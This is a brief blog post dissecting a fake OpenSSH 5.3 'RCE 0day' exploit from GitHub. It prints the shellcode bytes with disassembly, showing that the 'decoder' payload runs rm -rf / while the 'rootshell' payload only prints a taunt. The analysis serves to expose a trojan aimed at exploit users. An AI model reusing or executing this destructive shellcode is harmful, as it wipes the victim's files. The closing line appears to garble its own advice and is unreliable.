A quick look of a fake 0day exploit :)

Just a normal day of work, I’m searching for vulnerability about OpenSSH 5.3. Surprisingly, there is an RCE 0day exploit on Github. I take a look at the exploit code before I compile it. Strangely, the exploit code is so simple especially the shellcode.

There are two shellcode in the exploit. I wrote some comments with assembly code.

decoder:

1
2
3
python -c 'print "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80"' > decoder.bin

objdump -D -b binary -M intel -m i386 decoder.bin
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
00000000 <.data>:
   0:	6a 0b                	push   0xb
   2:	58                   	pop    eax          // syscall: sys_execve
   3:	99                   	cdq
   4:	52                   	push   edx
   5:	6a 2f                	push   0x2f
   7:	89 e7                	mov    edi,esp
   9:	52                   	push   edx           
   a:	66 68 2d 66          	pushw  0x662d       // "-f"
   e:	89 e6                	mov    esi,esp
  10:	52                   	push   edx
  11:	66 68 2d 72          	pushw  0x722d       // "-r"
  15:	89 e1                	mov    ecx,esp
  17:	52                   	push   edx
  18:	68 2f 2f 72 6d       	push   0x6d722f2f   // "//rm"
  1d:	68 2f 62 69 6e       	push   0x6e69622f   // "/bin"
  22:	89 e3                	mov    ebx,esp
  24:	52                   	push   edx
  25:	57                   	push   edi
  26:	56                   	push   esi
  27:	51                   	push   ecx
  28:	53                   	push   ebx
  29:	89 e1                	mov    ecx,esp
  2b:	cd 80                	int    0x80         // syscall
  2d:	0a                   	.byte 0xa

rootshell:

1
2
3
python -c 'print "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31\xdb\x40\xcd\x80"' > rootshell.bin

objdump -D -b binary -M intel -m i386  rootshell.bin
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
00000000 <.data>:
   0:	31 d2                	xor    edx,edx
   2:	b2 0a                	mov    dl,0xa
   4:	b9 6f 75 21 0a       	mov    ecx,0xa21756f    // "ou!"
   9:	51                   	push   ecx
   a:	b9 63 6b 20 79       	mov    ecx,0x79206b63   // "ck y"
   f:	51                   	push   ecx
  10:	66 b9 66 75          	mov    cx,0x7566        // "fu"
  14:	66 51                	push   cx
  16:	31 c9                	xor    ecx,ecx
  18:	89 e1                	mov    ecx,esp
  1a:	31 db                	xor    ebx,ebx
  1c:	b3 01                	mov    bl,0x1           // sys_write ebx: fd = 1
  1e:	31 c0                	xor    eax,eax
  20:	b0 04                	mov    al,0x4           // syscall: sys_write
  22:	cd 80                	int    0x80             // syscall
  24:	31 c0                	xor    eax,eax
  26:	31 db                	xor    ebx,ebx
  28:	40                   	inc    eax              // syscall: sys_exit
  29:	cd 80                	int    0x80             // syscall
  2b:	0a                   	.byte 0xa

That’s all. A fake 0day exploit.

After some searching, I found an older post from pastbin and another people’s analysis blog. Also, there was already an issue on GitHub reference to the same blog. It seems like I’m too involved in the research without searching for some related information first :)

All in all, it is a short relaxing moment on Monday’s working hours. Use the exploit before you read it and understanding it.

BTW, no RCE exploit TAT.